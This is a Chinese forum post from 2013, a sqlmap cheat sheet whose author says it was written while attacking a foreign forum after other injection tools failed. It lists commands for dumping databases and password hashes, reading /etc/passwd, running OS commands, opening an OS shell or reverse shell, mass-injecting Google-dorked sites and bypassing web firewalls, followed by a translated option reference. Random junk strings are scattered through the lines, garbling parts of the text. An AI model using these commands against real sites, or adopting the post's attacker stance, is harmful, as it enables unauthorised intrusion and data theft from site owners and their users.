今天搞国外的一个论坛。发现萝卜和穿山甲都无法正常注入,实在没办法了 还是临时学习了下国外的神器sqlmap的使用方法,,直接做个记录、、- S+ u2 |4 m- _# {: d) B/ K+ A( ?
sqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id=1″ –current-db #获取当前数 据库名称5 ^& B5 |& {% m- A3 U* Q
sqlmap -u “http://www.xxoo.com/news?id=1″ –tables -D “db_name”#列 表名
- |) I. f1 v# V. }# Jsqlmap -u “http://url/news?id=1″ –columns -T “tablename”users-D “db_name”-v 0 #列字段
% a5 ~# _8 }9 T. y ' d& ^0 z# B9 G+ O# b- c
sqlmap -u “http://url/news?id=1″ –dump -C “column_name” -T “table_name”-D “db_name”-v4 l5 q' R- k j5 b, C
0 #获取字段内容
/ f$ F( [ F# y+ y& X1 ~; V . S w- e- y& Y% j! m/ f. Z% o0 f* }
******************信息获取******************' X: N5 N9 e- Z% z
sqlmap -u “http://url/news?id=1″ –dbms “Mysql” –users # dbms 指定数 据库类型+ [3 _/ j3 _: Z
sqlmap -u “http://url/news?id=1″ –users #列数据库用户" \+ e4 P$ I& H$ [2 h
sqlmap -u “http://url/news?id=1″ –dbs#列数据库" G. W4 }& S* G0 Z
sqlmap -u “http://url/news?id=1″ –passwords #数据库用户密码
2 ?) [" \9 I* \/ t4 H& _ ~2 k0 isqlmap -u “http://url/news?id=1″ –passwords-U root -v 0 #列出指定用户 数据库密码
. A2 {! |. { c' X( T) _8 Q! ~: rsqlmap -u “http://url/news?id=1″ –dump -C “password,user,id” -T “tablename”-D “db_name”' \, I3 q% e* b5 Z1 K+ Z: [
–start 1 –stop 20 #列出指定字段,列出20 条
+ c; W4 k/ r+ I# F3 w5 M1 ksqlmap -u “http://url/news?id=1″ –dump-all -v 0 #列出所有数据库所有表
% T. [8 j& x. \6 d0 b2 s+ u2 _sqlmap -u “http://url/news?id=1″ –privileges #查看权限
9 @8 j1 N; Q2 k/ E3 s! l: isqlmap -u “http://url/news?id=1″ –privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色0 M {& G7 X, }2 D8 P( J
sqlmap -u “http://url/news?id=1″ –udf-inject #导入用户自定义函数(获取 系统权限!)6 q: {/ g( m) p: f
sqlmap -u “http://url/news?id=1″ –dump-all –exclude-sysdbs -v 0 #列 出当前库所有表; \6 M k! Q6 @# s) u. T4 m
sqlmap -u “http://url/news?id=1″ –union-cols #union 查询表记录4 X9 }1 \& ?5 Z2 a0 u
sqlmap -u “http://url/news?id=1″ –cookie “COOKIE_VALUE”#cookie注入
/ ^' ]* L" v4 m1 Zsqlmap -u “http://url/news?id=1″-b #获取banner信息
$ c: a& e: Q) z0 ^% P) ssqlmap -u “http://url/news?id=1″ –data “id=3″#post注入0 Y3 m P; t; [" T+ ~( o. g6 A! G
sqlmap -u “http://url/news?id=1″-v 1 -f #指纹判别数据库类型
9 K# P: S3 ~' H" w3 o) ssqlmap -u “http://url/news?id=1″ –proxy“http://127.0.0.1:8118” #代理注 入% w. k+ M! N& V& y/ c" ]
sqlmap -u “http://url/news?id=1″–string”STRING_ON_TRUE_PAGE”# 指 定关键词
* j4 ?3 _# I3 n3 M6 @6 m$ a1 ]5 lsqlmap -u “http://url/news?id=1″ –sql-shell #执行指定sql命令
) @. o/ B V" `6 r" Y/ Osqlmap -u “http://url/news?id=1″ –file /etc/passwd
( T+ D& }1 c% Y; w6 i6 |sqlmap -u “http://url/news?id=1″ –os-cmd=whoami #执行系统命令/ U" I$ Y2 u/ X# R
sqlmap -u “http://url/news?id=1″ –os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell
2 F8 }. N3 | I7 s2 }1 Bsqlmap -u “http://url/news?id=1″ –reg-read #读取win系统注册表5 f' j! E# W! m5 f% p& }$ ^1 X; r
sqlmap -u “http://url/news?id=1″ –dbs-o “sqlmap.log”#保存进度
/ z$ ]+ E* g+ e& R$ F0 F3 [sqlmap -u “http://url/news?id=1″ –dbs -o “sqlmap.log” –resume #恢复 已保存进度
' ~6 [/ \- K! F5 H***********高级用法*************" P& n v' H+ g6 S; J+ A5 y! o
-p name 多个参数如index.php?n_id=1&name=2&data=2020 我们想指定name参数进行注入
3 l( M( z- O2 p5 O3 z0 Rsqlmap -g “google语法” –dump-all –batch #google搜索注入点自动 跑出 所有字段 需保证google.com能正常访问& h5 D t9 P, b& a
–technique 测试指定注入类型\使用的技术7 L! C7 Z u2 M6 d8 z5 y
不加参数默认测试所有注入技术
- T9 j9 W8 |+ c7 p4 X2 q9 o• B: 基于布尔的SQL 盲注$ K4 E4 S& B/ D, [' v
• E: 基于显错sql 注入" j5 W* v/ k+ H3 K5 G
• U: 基于UNION 注入
0 M. \% W# \' }/ ^/ e• S: 叠层sql 注入
: V& x9 c' N4 ?4 }8 i, N/ {• T: 基于时间盲注# e- x H; n! L- o( N7 N
–tamper 通过编码绕过WEB 防火墙(WAF)Sqlmap 默认用char()
5 m+ c. m \# i: W6 x$ p. [" o–tamper 插件所在目录6 e" y" O0 o4 u9 h* i; i' _3 q+ q7 `
\sqlmap-dev\tamper
* }+ E0 L6 o, \1 l* [sqlmap -u “http:// www.2cto.com /news?id=1″ –smart –level 3 –users # smart 智 能8 L2 ^5 ?4 Y. [, e6 r
level 执行测试等级 攻击实例:' u; x/ D* {* z9 ]* r! i; `
Sqlmap -u “http://url/news?id=1&Submit=Submit”& }$ M3 p6 o5 M: h( A
–cookie=”PHPSESSID=41aa833e6d0d
5 q, @. C1 _7 o' e: E% h! ~8 {6 n28f489ff1ab5a7531406″ –string=”Surname” –dbms=mysql –user
7 Q' e% f q; X& u" y' p–password
. d9 [8 c4 Z( D" X; j参考文档:http://sqlmap.sourceforge.net/doc/README.html8 }2 A* u' j* {4 J6 J. I$ g; Y
***********安装最新版本*************2 O6 _( q6 K! c& D/ H
ubuntu 通过apt-get install 安装的sqlmap版本为0.6 我们通过svn 来安装 为 最新1.0版; [8 b8 D1 E* w9 }& ^
sudo svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
. v G8 N# H% P2 f! d# e# O* n安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py 直接执行/home/当前用户/sqlmap-dev/sqlmap.py –version 这样很不方便 我们可以设置.bashrc 文件
$ ^3 P/ \2 a# h, v2 [sudo vim /home/当前用户/.bashrc
6 X. x1 K; ^* z3 c5 I#任意位置加上:4 z! D+ I( t4 A0 V5 h
alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 该环境变量只对当前用户有效/ Z) N/ O7 X* F2 `: A
如果想对所有用户有效 可设置全局 编辑下面的文件2 G8 l3 C4 g# E$ M X8 f! O
vim /etc/profile
( D% P7 [, ^/ d% E4 f同样加上:
. E0 J4 C& y& v+ M) n% Kalias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 重启生效 x7 b2 W" n' ]* ~- ? Q: r
******************windows 7 (x64) sqlmap install (SVN)************- C6 X [1 e9 N% d* A) ]. E% r3 |
http://www.python.org/getit/ 安装python: v4 [: X7 e8 s x
http://www.sliksvn.com/en/download 安装windows svn client
# E' H: B8 M5 y I/ Esvn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev, o5 o1 B6 g- d- r
安装sqlmap, g. W3 {) L3 Y8 E+ Y
*修改环境变量# r+ K r0 e3 z$ I% c
–version 显示程序的版本号并退出
$ \ z, x, m% I-h, –help 显示此帮助消息并退出
; ~ U; ?" g6 i1 A' v-v VERBOSE 详细级别:0-6(默认为1)
$ H. N7 Q# Q2 K, n+ [) FTarget(目标): 以下至少需要设置其中一个选项,设置目标URL。
) a, V, Q1 ~/ [-d DIRECT 直接连接到数据库。
$ A& P9 ?& O& o: \* k* h( H" p-u URL, –url=URL 目标URL。
: q6 D% `7 ^) _5 o, S-l LIST 从Burp 或WebScarab 代理的日志中解析目标。
7 V# I/ c5 }1 L( Z! r-r REQUESTFILE 从一个文件中载入HTTP 请求。. D* L+ S7 D/ x: |/ c9 H
-g GOOGLEDORK 处理Google dork 的结果作为目标URL。
4 o% r6 J# l/ M$ q# U9 f-c CONFIGFILE 从INI 配置文件中加载选项。6 f# T% z6 y! e' v
Request(请求)::6 L1 x& c4 E0 N. e+ d
这些选项可以用来指定如何连接到目标URL。 \: i" c4 _! i" M8 }9 }
–data=DATA 通过POST 发送的数据字符串
$ Q+ Q. {* u% m, ?7 y( @/ @" n- g–cookie=COOKIE HTTP Cookie 头
1 p- y3 T* {$ k/ R; {–cookie-urlencode URL 编码生成的cookie 注入
. _1 x( ~/ s& ?5 U–drop-set-cookie 忽略响应的Set –Cookie 头信息/ ^2 L- U0 e. I
$ W: Z9 H, \5 U. F& o- c
–user-agent=AGENT 指定 HTTP User –Agent 头4 D: z" K- k; }/ p9 z
–random-agent 使用随机选定的HTTP User –Agent 头* I! p l. o% ^, I7 y/ |, h
–referer=REFERER 指定 HTTP Referer 头
, k' N9 i0 k; ~) ]. F# r0 V" ^$ g–headers=HEADERS 换行分开,加入其他的HTTP 头
/ J9 W# X+ ^; M–auth-type=ATYPE HTTP 身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)7 s) h! }$ X& c& l7 \2 T4 C3 K
–auth-cred=ACRED HTTP 身份验证凭据(用户名:密码)
& v9 q0 v" f, U0 O7 l/ q# {–auth-cert=ACERT HTTP 认证证书(key_file,cert_file)
$ B8 S2 z" r4 V/ ?8 P–proxy=PROXY 使用HTTP 代理连接到目标URL
5 l" j+ f7 n- ^9 R$ `1 w–proxy-cred=PCRED HTTP 代理身份验证凭据(用户名:密码)
h* [+ u l' p2 G( y–ignore-proxy 忽略系统默认的HTTP 代理
~$ ~1 n$ b/ ~9 W6 g–delay=DELAY 在每个HTTP 请求之间的延迟时间,单位为秒8 R& _4 h# H" w6 M) b8 Y
–timeout=TIMEOUT 等待连接超时的时间(默认为30 秒) ^( l' J& c9 J+ I- G
–retries=RETRIES 连接超时后重新连接的时间(默认3)0 t$ }3 A/ |0 X' n, K5 H! m
–scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式1 t# u. i5 T8 e) ?/ `
–safe-url=SAFURL 在测试过程中经常访问的url 地址) _' M9 c( s1 {; C
–safe-freq=SAFREQ 两次访问之间测试请求,给出安全的URL, Y: q: _: ` W$ A, g; l
Optimization(优化): 这些选项可用于优化SqlMap 的性能。! _- ^$ i$ m( h" |% `
-o 开启所有优化开关
. G0 [7 ]. w1 J–predict-output 预测常见的查询输出- J5 U! N& G! ?4 m; |
–keep-alive 使用持久的HTTP(S)连接
$ v; Z1 E3 m u) u8 s4 s–null-connection 从没有实际的HTTP 响应体中检索页面长度
! S$ a, L$ E# e8 f" E–threads=THREADS 最大的HTTP(S)请求并发量(默认为1)6 z2 [% A- k4 Z: K* ^, \
Injection(注入):- Z% E: }5 V `7 S) U* o
这些选项可以用来指定测试哪些参数, 提供自定义的注入payloads 和可选篡改脚本。" _1 ~1 i3 X" O# \( _
-p TESTPARAMETER 可测试的参数(S)
/ u0 G6 D- Y% q' J. ]; M* ~–dbms=DBMS 强制后端的DBMS 为此值* k I+ g* Q( x+ N
–os=OS 强制后端的DBMS 操作系统为这个值
% f8 ]$ @5 A, F–prefix=PREFIX 注入payload 字符串前缀' s8 O5 q8 J- A3 G& A$ R
–suffix=SUFFIX 注入 payload 字符串后缀1 c" Z: C4 g0 C1 r7 z" r& \3 K; b* A
–tamper=TAMPER 使用给定的脚本(S)篡改注入数据
6 d2 U! }; N# L6 DDetection(检测):* I# B' ~2 F1 v( T
这些选项可以用来指定在SQL 盲注时如何解析和比较HTTP 响应页面的内容。6 ~/ c; p7 `5 o& Z
–level=LEVEL 执行测试的等级(1-5,默认为1)
+ N8 Z4 i9 K, N/ U+ L( {–risk=RISK 执行测试的风险(0-3,默认为1)
2 F1 E/ o, A+ V9 U8 \3 `; i; [- F–string=STRING 查询时有效时在页面匹配字符串. T. }) D/ H6 C v, L
–regexp=REGEXP 查询时有效时在页面匹配正则表达式
# s* [" n# C# }–text-only 仅基于在文本内容比较网页
. y5 E7 y" i. iTechniques(技巧): 这些选项可用于调整具体的SQL 注入测试。
' i+ [9 m" N. p* Z# c: m, [& l–technique=TECH SQL 注入技术测试(默认BEUST)
4 r* i, J* _+ N0 j* d8 \–time-sec=TIMESEC DBMS 响应的延迟时间(默认为5 秒)/ g# l# e5 }0 Y. {
–union-cols=UCOLS 定列范围用于测试UNION 查询注入
" n7 r3 j+ \, U% C- c: x @- p* Z–union-char=UCHAR 用于暴力猜解列数的字符+ b) V) P+ f. k" T0 l* D) H
Fingerprint(指纹):2 N" [( G% n7 K
-f, –fingerprint 执行检查广泛的DBMS 版本指纹) O b. v, W+ Y+ Q/ I" O( y; K
Enumeration(枚举):
5 p) W0 C$ M) W% x/ L' [
/ \; F" K2 u r, ?$ h" f这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己 的SQL 语句。
6 T: h$ B' @8 u! A' C( n9 W-b, –banner 检索数据库管理系统的标识* K1 d6 c0 Q* @. j, J: G; I
–current-user 检索数据库管理系统当前用户3 v) G$ W: q6 @/ w
–current-db 检索数据库管理系统当前数据库* u, T$ d0 x. x) m4 M8 w
–is-dba 检测DBMS 当前用户是否DBA& y" K0 ^! u1 A) n g! @
–users 枚举数据库管理系统用户, L7 D2 _7 }) D. h0 F5 ]
–passwords 枚举数据库管理系统用户密码哈希5 W' P4 a2 r0 \- T( n5 L6 y l$ o
–privileges 枚举数据库管理系统用户的权限
/ O; @" |( `) P# r% N% U; T4 _–roles 枚举数据库管理系统用户的角色0 w& |3 q3 M) h: s
–dbs 枚举数据库管理系统数据库9 h. a' [2 w7 J$ C8 P2 Z9 _
–tables 枚举的DBMS 数据库中的表8 I6 d2 W- \1 ]. |% e2 U
–columns 枚举DBMS 数据库表列( w; u7 r6 w$ \
–dump 转储数据库管理系统的数据库中的表项% r! y, [$ i* V
–dump-all 转储所有的DBMS 数据库表中的条目
$ c; T5 @' `" V1 j# k3 J–search 搜索列(S),表(S)和/或数据库名称(S)5 y6 J* ?4 y0 ]& L6 X7 {5 e$ n
-D DB 要进行枚举的数据库名& F- Z6 U m4 R/ s9 F% B+ P% W
-T TBL 要进行枚举的数据库表
; h7 n( S# h- I4 U-C COL 要进行枚举的数据库列
/ c2 \& S& C% g( Y" ]-U USER 用来进行枚举的数据库用户
$ B, h! @6 A! Q# J2 u3 Z–exclude-sysdbs 枚举表时排除系统数据库
/ l( M8 w; `2 B# ~" `–start=LIMITSTART 第一个查询输出进入检索% \% M! v9 Q) k' q" O( z* ~
–stop=LIMITSTOP 最后查询的输出进入检索( N3 O' g0 i0 a) {# j6 S8 V6 s
–first=FIRSTCHAR 第一个查询输出字的字符检索
$ U! s1 B+ i8 ^; t" f6 s& N1 R( I–last=LASTCHAR 最后查询的输出字字符检索
/ I( D0 g; D( j# I1 E–sql-query=QUERY 要执行的SQL 语句
$ V2 R4 l: F5 Q0 r2 y6 J7 }1 O% s–sql-shell 提示交互式SQL 的shell! S8 ^8 C0 ?9 z, E
Brute force(蛮力): 这些选项可以被用来运行蛮力检查。
+ K3 q1 m, G3 r% `! g–common-tables 检查存在共同表
0 I! p2 X' b, G5 @! R: g& n–common-columns 检查存在共同列: e8 O% F' r; a8 l
User-defined function injection(用户自定义函数注入): 这些选项可以用来创建用户自定义函数。+ f- f& c% D8 z4 k# ]) s
–udf-inject 注入用户自定义函数" M5 l V) D5 G. p( J! E& u0 C/ i
–shared-lib=SHLIB 共享库的本地路径
" ]! m: I; m: T, d/ DFile system access(访问文件系统): 这些选项可以被用来访问后端数据库管理系统的底层文件系统。
+ w- _( W/ V( w2 c" c–file-read=RFILE 从后端的数据库管理系统文件系统读取文件9 N2 S [: J1 O n5 Q/ }; U/ i
–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件9 |! {5 g( j/ X$ |4 i" f
–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径
6 k# G- W# v! D9 G5 VOperating system access(操作系统访问): 这些选项可以用于访问后端数据库管理系统的底层操作系统。! i+ I3 J9 s9 S/ ^7 G: u0 Y* r4 V
–os-cmd=OSCMD 执行操作系统命令+ f* r, B) @9 C2 t
–os-shell 交互式的操作系统的shell% H1 e4 ~* X6 \/ q
–os-pwn 获取一个OOB shell,meterpreter 或VNC3 L. R% H* k" } I+ j3 ~0 G
–os-smbrelay 一键获取一个OOB shell,meterpreter 或VNC
" x. ?* P7 D: B" h9 |–os-bof 存储过程缓冲区溢出利用# M2 I( M7 Y" b7 F7 G$ `# w
–priv-esc 数据库进程用户权限提升
; a. C5 e& S1 I; ^' ^& d `–msf-path=MSFPATH Metasploit Framework 本地的安装路径% N( _& _, w& Q. S
–tmp-path=TMPPATH 远程临时文件目录的绝对路径, f/ A/ h9 M6 o: v
# q9 L) u+ r a* i0 J5 D0 [
Windows 注册表访问: 这些选项可以被用来访问后端数据库管理系统Windows 注册表。
" G: ?/ ]" O; O4 }, R, D7 A8 L–reg-read 读一个Windows 注册表项值; I+ W- j" Q. I' v% p
–reg-add 写一个Windows 注册表项值数据
7 p/ X y2 F' b–reg-del 删除Windows 注册表键值
5 m' h: I3 u) }$ @2 b) e: u- c–reg-key=REGKEY Windows 注册表键
4 }2 o4 ?( A0 x4 _" h–reg-value=REGVAL Windows 注册表项值4 n6 x3 p' t. P2 N6 K$ L' f
–reg-data=REGDATA Windows 注册表键值数据; B7 o; V' z- T- A+ o& K5 a
–reg-type=REGTYPE Windows 注册表项值类型" H' k, _, D6 U; x3 f' A
General(一般): 这些选项可以用来设置一些一般的工作参数。
& R+ }, ?0 f2 Z$ Z4 i-t TRAFFICFILE 记录所有HTTP 流量到一个文本文件中9 n2 n* d2 x0 _+ H: d
-s SESSIONFILE 保存和恢复检索会话文件的所有数据0 a; Y5 B+ z# P% f' D
–flush-session 刷新当前目标的会话文件
8 H- ?0 b: | q- ^2 b–fresh-queries 忽略在会话文件中存储的查询结果
" u# L4 @7 o" s7 I% c+ b: H: N% R0 H–eta 显示每个输出的预计到达时间
' S5 X" J+ q% h( e) ^–update 更新SqlMap
8 X6 |3 [- [/ @. \7 k5 o–save file 保存选项到INI 配置文件
+ M+ r) s: g! ?8 ^: z$ L5 Y8 G' K& Q–batch 从不询问用户输入,使用所有默认配置。1 p2 T' G! V/ W( {
Miscellaneous(杂项):
1 N. \ j G9 b1 w6 i–beep 发现SQL 注入时提醒
( H0 Y" |, `* o' Z% W–check-payload IDS 对注入payloads 的检测测试' [. W3 o7 X0 q9 L6 T1 I
–cleanup SqlMap 具体的UDF 和表清理DBMS- g, Z; F) L( A
–forms 对目标URL 的解析和测试形式* b/ \' H( I. {
–gpage=GOOGLEPAGE 从指定的页码使用谷歌dork 结果
. g- h. R: G$ ]) E5 |, i3 S0 S–page-rank Google dork 结果显示网页排名(PR)
: }$ l2 c" ^0 z, q' l–parse-errors 从响应页面解析数据库管理系统的错误消息
; [' _4 J4 u6 l5 F; V2 j' H–replicate 复制转储的数据到一个sqlite3 数据库8 f4 |6 p1 ^; Z) u, u3 y
–tor 使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址# @( s' [ J( k/ B" i( j
–wizard 给初级用户的简单向导界面 |
发表于 2013-4-4 22:26:32
收藏
支持
反对